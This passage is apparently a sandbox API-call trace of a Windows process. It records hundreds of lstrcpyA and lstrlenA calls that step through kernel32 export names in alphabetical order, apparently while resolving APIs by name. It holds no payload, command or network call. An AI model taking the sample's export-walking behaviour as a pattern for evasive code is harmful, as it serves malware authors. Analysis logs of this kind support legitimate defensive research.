returned="BaseQueryModuleData" [0083.075] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.075] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.075] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.075] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.075] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.075] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.075] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.075] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.075] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.075] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.075] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.075] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.075] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.075] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.075] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.075] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.075] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.075] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.075] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.075] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.075] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.075] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.075] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.075] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.075] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.075] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.075] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.075] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.075] lstrlenA (lpString="BEEP") returned 4 [0083.075] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.076] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.076] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.076] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.076] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.076] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.076] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.076] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.076] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.076] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.076] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.076] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.076] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.076] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.076] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.076] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.076] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.076] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.076] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.076] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.076] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.076] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.076] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.076] lstrlenA (lpString="CANCELIO") returned 8 [0083.076] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.076] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.076] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.076] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.076] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.076] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.076] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.076] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.076] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.076] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.076] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.076] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.076] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.076] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.077] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.077] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.077] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.077] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.077] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.077] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.077] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.077] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.077] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.077] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.077] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.077] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.077] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.077] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.077] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.077] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.077] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.077] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.077] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.077] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.077] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.077] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.077] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.077] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.077] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.077] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.077] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.077] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.077] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.077] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.077] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.077] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.077] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.077] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.077] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.077] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.077] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.078] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.078] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.078] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.078] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.078] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.078] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.078] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.078] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.078] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.078] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.078] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.078] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.078] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.078] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.078] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.078] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.078] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.078] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.078] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.078] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.078] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.078] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.078] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.078] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.078] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.078] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.078] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.078] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.078] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.078] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.078] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.078] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.078] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.078] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.078] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.078] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.078] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.079] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.079] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.079] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.079] lstrlenA (lpString="COPYFILEA") returned 9 [0083.079] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.079] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.079] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.079] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.079] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.079] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.079] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.079] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.079] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.079] lstrlenA (lpString="COPYFILEW") returned 9 [0083.079] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.079] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.079] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.079] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.079] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.079] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.079] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.079] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.079] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.079] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.079] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.079] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.079] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.079] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.079] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.079] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.079] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.079] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.079] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.079] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.079] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.079] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.079] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.080] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.080] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.080] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.080] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.080] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.080] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.080] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.080] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.080] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.080] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.080] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.080] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.080] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.080] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.080] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.080] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.080] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.080] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.080] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.080] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.080] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.080] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.080] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.080] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.080] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.080] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.080] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.080] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.080] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.080] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.080] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.080] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.080] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.080] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.080] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.080] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.080] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.081] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.081] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.081] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.081] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.081] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.081] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.081] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.081] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.081] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.081] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.081] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.081] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.081] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.081] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.081] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.081] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.081] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.081] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.081] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.081] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.081] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.081] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.081] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.081] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.081] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.081] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.081] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.081] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.081] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.081] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.081] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.081] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.081] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.081] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.081] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.081] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.081] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.081] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.082] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") 